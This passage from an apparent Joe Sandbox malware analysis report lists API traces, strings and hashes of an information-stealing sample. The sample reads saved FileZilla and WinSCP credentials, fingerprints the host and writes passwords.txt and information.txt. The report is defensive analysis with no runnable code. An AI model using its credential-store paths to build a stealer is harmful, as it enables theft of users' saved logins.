                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                                • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • memset.MSVCRT ref: 0040C06C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040E7BD
                                                                                • memset.MSVCRT ref: 0040E7E6
                                                                                • memset.MSVCRT ref: 0040E806
                                                                                • memset.MSVCRT ref: 0040E81A
                                                                                • memset.MSVCRT ref: 0040E82E
                                                                                • memset.MSVCRT ref: 0040E83D
                                                                                • memset.MSVCRT ref: 0040E84B
                                                                                • memset.MSVCRT ref: 0040E85C
                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                                • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C8F), ref: 0040E9A2
                                                                                • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$Value$Open$EnumH_prolog
                                                                                • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

                                                                                Control-flow Graph

                                                                                control_flow_graph 877 414604-4153f5 _EH_prolog call 40f923 call 40fa9c call 40f9e1 call 40f98e call 4020ed call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410415 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104a2 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104dd call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e GetCurrentProcessId call 411001 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41064b call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41077c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410925 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbfd call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbcb call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4103a0 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fce5 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 
call 40f98e call 40fc92 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe18 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40feb4 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ff81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ffea call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4102c3 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d call 40f923 call 4010b1 call 414437 call 40f98e * 2 call 401061
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00414609
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
                                                                                  • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
                                                                                  • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
                                                                                  • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                                  • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                                  • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                  • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                  • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                                  • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                  • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                  • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                  • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                  • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00426600,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004265F4,00000000), ref: 00414922
                                                                                  • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                  • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                  • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                  • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                  • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                  • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                                  • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                  • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                  • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                  • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                  • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                                  • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                                  • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                  • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                  • Part of subcall function 00410925: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                  • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                  • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                  • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000), ref: 0040FC09
                                                                                  • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                                  • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                                  • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                  • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                  • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                  • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                  • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                  • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                  • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                  • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
                                                                                  • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
                                                                                  • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                                  • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                  • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
                                                                                  • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                  • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                  • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                  • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                  • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                  • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                  • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                  • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                                  • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                  • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                  • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                  • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                  • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
                                                                                  • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                                  • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                                  • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                                  • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                  • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                  • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                  • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                                  • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                                  • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                                  • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                                  • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                  • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                  • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                  • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                  • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                                  • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                  • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                  • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                                  • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                  • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                  • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                  • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00426748,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00426738), ref: 0041537A
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                • API String ID: 722754166-3257470747
                                                                                • Opcode ID: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                • Instruction ID: 15cc8dd7e761a7b9687d1197911a175701b94bd7e601d052700fcacce4104c59
                                                                                • Opcode Fuzzy Hash: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                • Instruction Fuzzy Hash: 53922EB190424DE9CB15E7E1C952BEEBB789F24308F5001BEE505725C2DE782B8CCAB5

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040C280
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BA4,?,?,?,00425B9E,?,00000000), ref: 0040C378
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                • lstrcat.KERNEL32(00000000,00425BA8), ref: 0040C4A7
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                • lstrcat.KERNEL32(00000000,00425BAC), ref: 0040C4C7
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                • lstrcat.KERNEL32(00000000,00425BB0), ref: 0040C4F6
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                • lstrcat.KERNEL32(00000000,00425BB4), ref: 0040C525
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                • lstrcat.KERNEL32(00000000,00425BB8), ref: 0040C554
                                                                                • lstrcat.KERNEL32(00000000,00425BBC), ref: 0040C562
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                • memset.MSVCRT ref: 0040C5E9
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                • String ID: passwords.txt
                                                                                • API String ID: 3298853120-347816968
                                                                                • Opcode ID: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                • Instruction ID: 3d2456610e152fb8fa5d54acb3feaddce6e398d7491f6e002fa618601dbd43d1
                                                                                • Opcode Fuzzy Hash: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                • Instruction Fuzzy Hash: 00C16971800159EEDB15EBE4DD1AEEEBB75BF18304F10407AF512B21E1DB782A09DB25

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00413911
                                                                                  • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                                  • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
